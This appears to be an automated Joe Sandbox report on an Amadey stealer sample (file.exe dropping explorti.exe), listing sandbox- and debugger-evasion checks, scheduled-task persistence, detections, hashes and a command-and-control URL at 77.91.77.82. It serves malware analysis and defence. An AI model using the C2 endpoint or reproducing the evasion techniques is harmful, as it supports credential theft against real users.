                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeThread information set: HideFromDebuggerJump to behavior
                      Potentially malicious time measurement code found
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_04B6024B Start: 04B60496 End: 04B602B31_2_04B6024B
                      Tries to detect sandboxes and other dynamic analysis tools (window names)
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: NTICE
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SICE
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeFile opened: SIWVID
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_050E024A rdtsc 0_2_050E024A
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_001A643B mov eax, dword ptr fs:[00000030h]1_2_001A643B
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_001AA1A2 mov eax, dword ptr fs:[00000030h]1_2_001AA1A2
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe "C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe" Jump to behavior
                      Source: explorti.exe, explorti.exe, 0000000A.00000002.3556094696.000000000035F000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: ]Program Manager
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_0018D2E8 cpuid 1_2_0018D2E8
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exeCode function: 1_2_0018CAED GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,1_2_0018CAED

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Amadeys stealer DLL
                      Source: Yara matchFile source: 0.2.file.exe.ab0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.explorti.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.explorti.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.explorti.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.explorti.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.explorti.exe.170000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.3555727988.0000000000171000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000003.2915454108.0000000004940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.1719361703.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000003.4117971144.0000000004980000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000003.3515001828.0000000004C70000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1679021275.0000000004EC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2955728153.0000000000171000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2355173181.0000000000171000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000003.2313491451.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.1755893369.0000000000171000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1714687088.0000000004950000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.1715649380.0000000005230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                      Command and Scripting Interpreter                      		1
                      Scheduled Task/Job                      		12
                      Process Injection                      		1
                      Masquerading                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Encrypted Channel                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job                      		1
                      DLL Side-Loading                      		1
                      Scheduled Task/Job                      		251
                      Virtualization/Sandbox Evasion                      		LSASS Memory741
                      Security Software Discovery                      		Remote Desktop ProtocolData from Removable Media1
                      Ingress Tool Transfer                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      DLL Side-Loading                      		12
                      Process Injection                      		Security Account Manager2
                      Process Discovery                      		SMB/Windows Admin SharesData from Network Shared Drive1
                      Non-Application Layer Protocol                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                      Obfuscated Files or Information                      		NTDS251
                      Virtualization/Sandbox Evasion                      		Distributed Component Object ModelInput Capture11
                      Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                      Software Packing                      		LSA Secrets1
                      Application Window Discovery                      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading                      		Cached Domain Credentials1
                      File and Directory Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      file.exe47%ReversingLabsWin32.Trojan.Generic
                      file.exe100%AviraTR/Crypt.TPM.Gen
                      file.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%AviraTR/Crypt.TPM.Gen
                      C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe47%ReversingLabsWin32.Trojan.Generic

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://77.91.77.82/Hun4Ko/index.php60%Avira URL Cloudsafe
                      http://77.91.77.82/Hun4Ko/index.phpG0%Avira URL Cloudsafe
                      http://77.91.77.82/Hun4Ko/index.php-e9c77b0923665da6f10%Avira URL Cloudsafe
                      http://77.91.77.82/Hun4Ko/index.php%0%Avira URL Cloudsafe
                      http://77.91.77.82/Hun4Ko/index.phpz0%Avira URL Cloudsafe
                      http://77.91.77.82/Hun4Ko/index.php;100%Avira URL Cloudphishing
                      http://77.91.77.82/Hun4Ko/index.php100%Avira URL Cloudphishing
                      http://77.91.77.82/Hun4Ko/index.php40971b6b0%Avira URL Cloudsafe
                      http://77.91.77.82/Hun4Ko/index.phpS0%Avira URL Cloudsafe
                      http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php100%Avira URL Cloudphishing

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://77.91.77.82/Hun4Ko/index.phptrue
                      • Avira URL Cloud: phishing
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://77.91.77.82/Hun4Ko/index.php-e9c77b0923665da6f1explorti.exe, 00000001.00000003.2367240042.0000000000E27000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://77.91.77.82/Hun4Ko/index.phpSexplorti.exe, 00000001.00000003.2367240042.0000000000DF7000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://77.91.77.82/Hun4Ko/index.php40971b6bexplorti.exe, 00000001.00000003.2367240042.0000000000E27000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://77.91.77.82/Hun4Ko/index.php;explorti.exe, 00000001.00000002.4137022991.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000001.00000003.2367240042.0000000000E02000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: phishing
                      		unknown
                      http://77.91.77.82/Hun4Ko/index.phpzexplorti.exe, 00000001.00000003.2367240042.0000000000E27000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://77.91.77.82/Hun4Ko/index.phpGexplorti.exe, 00000001.00000002.4137022991.0000000000E32000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://77.91.77.82/Hun4Ko/index.php6explorti.exe, 00000001.00000003.2367240042.0000000000E27000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://77.91.77.82/Hun4Ko/index.php%explorti.exe, 00000001.00000002.4137022991.0000000000E32000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000001.00000002.4137022991.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000001.00000003.2367240042.0000000000E02000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.phpexplorti.exe, 00000001.00000002.4137022991.0000000000E01000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 00000001.00000003.2367240042.0000000000E02000.00000004.00000020.00020000.00000000.sdmptrue
                      • Avira URL Cloud: phishing
                      		unknown

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      77.91.77.82
                      		unknownRussian Federation
                      		42861FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUtrue

                      General Information

                      Joe Sandbox version:40.0.0 Tourmaline
                      Analysis ID:1464456
                      Start date and time:2024-06-28 21:15:07 +02:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 9m 35s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:12
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:file.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@8/3@0/1
                      EGA Information:
                      • Successful, ratio: 57.1%
                      HCA Information:Failed
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                      Warnings

                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target explorti.exe, PID 4076 because there are no executed function
                      • Execution Graph export aborted for target explorti.exe, PID 7844 because there are no executed function
                      • Execution Graph export aborted for target file.exe, PID 7152 because it is empty
                      • HTTP sessions have been limited to 150. Please view the PCAPs for the complete data.
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtDeviceIoControlFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: file.exe

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      15:16:02API Interceptor13461162x Sleep call for process: explorti.exe modified
                      20:16:00Task SchedulerRun new task: explorti path: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      77.91.77.82j7iUba2bki.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                      • 77.91.77.82/Hun4Ko/index.php
                      1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                      • 77.91.77.82/Hun4Ko/index.php
                      ukuWaeRgPR.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                      • 77.91.77.82/Hun4Ko/index.php

                      Domains

                      No context

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      FOTONTELECOM-TRANSIT-ASFOTONTELECOMISPRUinstaller.exeGet hashmaliciousRisePro StealerBrowse
                      • 77.91.77.66
                      jYXfxdLoiV.pdfGet hashmaliciousGRQ ScamBrowse
                      • 77.91.77.34
                      j7iUba2bki.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                      • 77.91.77.82
                      1Cvd8TyYPm.exeGet hashmaliciousLummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRATBrowse
                      • 77.91.77.80
                      ukuWaeRgPR.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                      • 77.91.77.82
                      tAa6xNsucX.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                      • 77.91.77.81
                      1Vkf7silOj.exeGet hashmaliciousLummaC, Amadey, Mars Stealer, PureLog Stealer, RedLine, SmokeLoader, StealcBrowse
                      • 77.91.77.81
                      wqmnYoVbHr.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                      • 77.91.77.81
                      EZrw1nNIpG.exeGet hashmaliciousAmadey, Mars Stealer, Stealc, VidarBrowse
                      • 77.91.77.81
                      file.exeGet hashmaliciousRisePro StealerBrowse
                      • 77.91.77.66

                      JA3 Fingerprints

                      No context

                      Dropped Files

                      No context

                      Created / dropped Files

                      C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe

                      Download File
                      Process:C:\Users\user\Desktop\file.exe
                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Category:dropped
                      Size (bytes):1899008
                      Entropy (8bit):7.950477475438436
                      Encrypted:false
                      SSDEEP:49152:ebJVjnY8vUfiefXca+t2ylwSraL+fIawpaXMv:kO8vUKe3aaqgac
                      MD5:A562C59E3A4D9BE348D5581D23E483DB
                      SHA1:7AD7D204946CEF1A528064B8B2DFEE70402684BC
                      SHA-256:68C00E3BB99DD666C421C6FD6B384FF5641EAD666C44936D8E84A9075FF79819
                      SHA-512:F1206F6AC50197EB50AA59B482C8921D383EB0586B19611D572387424C20445CE5A06C021188392E0E8D3D99FABF32C6BEDBD5446F0A529AA1630A77F709F6B1
                      Malicious:true
                      Antivirus:
                      • Antivirus: Avira, Detection: 100%
                      • Antivirus: Joe Sandbox ML, Detection: 100%
                      • Antivirus: ReversingLabs, Detection: 47%
                      Reputation:low
                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>.................PE..L.....af.............................PK...........@...........................K...........@.................................X...l...........................t/K.............................$/K..................................................... . ............................@....rsrc...............................@....idata ............................@... ..*.........................@...vmjyxrbh.....P1.....................@...bxjwqywv.....@K.....................@....taggant.0...PK.."..................@...........................................................................................................................................................................................................................

                      C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe:Zone.Identifier

                      Download File
                      Process:C:\Users\user\Desktop\file.exe
                      File Type:ASCII text, with CRLF line terminators
                      Category:modified
                      Size (bytes):26
                      Entropy (8bit):3.95006375643621
                      Encrypted:false
                      SSDEEP:3:ggPYV:rPYV
                      MD5:187F488E27DB4AF347237FE461A079AD
                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                      Malicious:true
                      Reputation:high, very likely benign file
                      Preview:[ZoneTransfer]....ZoneId=0

                      C:\Windows\Tasks\explorti.job

                      Download File
                      Process:C:\Users\user\Desktop\file.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):288
                      Entropy (8bit):3.4260683554193005
                      Encrypted:false
                      SSDEEP:6:pe2FJ6PPX4RKUEZ+lX1QYShMl6lm6tPjgsW2YRZuy0lqwt0:pOv4RKQ13vg7jzvYRQVNt0
                      MD5:784B49D5D0E6521E4F37B60AA43D35C3
                      SHA1:70D69D258D335F8D52785BB94068154B728D2100
                      SHA-256:F11D03186130E6673B1D2672F8C560C47C0755F531A5E98D42C40F0D61FE2C23
                      SHA-512:36ADB9C46DDDCD3E3449EE2C9E75E86B7AA3515C9EF77CF616F8AB147253F9C9FB7DFF0D1870C8F9FA5530FA77E65024622D3BE7ACF8F9BDD828B7632CDEF0D1
                      Malicious:false
                      Reputation:low
                      Preview:....7.O..e.A.,...w<VF.......<... .....s.......... ....................:.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.d.4.0.9.7.1.b.6.b.\.e.x.p.l.o.r.t.i...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

                      Static File Info

                      General

                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                      Entropy (8bit):7.950477475438436
                      TrID:
                      • Win32 Executable (generic) a (10002005/4) 99.96%
                      • Generic Win/DOS Executable (2004/3) 0.02%
                      • DOS Executable Generic (2002/1) 0.02%
                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                      File name:file.exe
                      File size:1'899'008 bytes
                      MD5:a562c59e3a4d9be348d5581d23e483db
                      SHA1:7ad7d204946cef1a528064b8b2dfee70402684bc
                      SHA256:68c00e3bb99dd666c421c6fd6b384ff5641ead666c44936d8e84a9075ff79819
                      SHA512:f1206f6ac50197eb50aa59b482c8921d383eb0586b19611d572387424c20445ce5a06c021188392e0e8d3d99fabf32c6bedbd5446f0a529aa1630a77f709f6b1
                      SSDEEP:49152:ebJVjnY8vUfiefXca+t2ylwSraL+fIawpaXMv:kO8vUKe3aaqgac
                      TLSH:BF95334BF7B351F1CD9953328D29836765B86EA221614D273D7A39BAC2CFA6C7180C70
                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........PJ.r>..r>..r>...=..r>...;.(r>.].:..r>.].=..r>.].;..r>...:..r>...?..r>..r?.^r>...7..r>......r>...<..r>.Rich.r>................

                      File Icon

                      Icon Hash:90cececece8e8eb0

                      Static PE Info

                      General

                      Entrypoint:0x8b5000
                      Entrypoint Section:.taggant
                      Digitally signed:false
                      Imagebase:0x400000
                      Subsystem:windows gui
                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                      DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                      Time Stamp:0x6661EA84 [Thu Jun 6 16:57:40 2024 UTC]
                      TLS Callbacks:
                      CLR (.Net) Version:
                      OS Version Major:6
                      OS Version Minor:0
                      File Version Major:6
                      File Version Minor:0
                      Subsystem Version Major:6
                      Subsystem Version Minor:0
                      Import Hash:2eabe9054cad5152567f0699947a2c5b

                      Entrypoint Preview

                      Instruction
                      jmp 00007F79804E6E1Ah
                      psubusb mm3, qword ptr [eax+eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      jmp 00007F79804E8E15h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [edx+ecx], al
                      add byte ptr [eax], al
                      pop es
                      or al, byte ptr [eax]
                      add byte ptr [edx], al
                      or al, byte ptr [eax]
                      add byte ptr [ebx], cl
                      or al, byte ptr [eax]
                      add byte ptr [ecx], al
                      or al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], cl
                      add byte ptr [eax], 00000000h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      adc byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, 0Ah
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      xor byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add al, 00h
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      and al, byte ptr [eax]
                      add byte ptr [eax], al
                      add byte ptr [eax], al
                      add byte ptr [eax], al

                      Data Directories

                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x6a0580x6c.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x690000x1e0.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x4b2f740x10vmjyxrbh
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x4b2f240x18vmjyxrbh
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x680000x2dc000d5159eb77472c9b96e11da75f057fcdFalse0.9981375939207651data7.984526344649267IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x690000x1e00x200290bb2a3837b711f15c9e047a1d493f8False0.576171875data4.550271282497515IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x6a0000x10000x2006e66ae8f9a75bc604a087c954abf8737False0.15234375data1.0684380430289213IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x6b0000x2aa0000x2000f39cc8ce6a497dca36fa2a6ed4eb01dunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
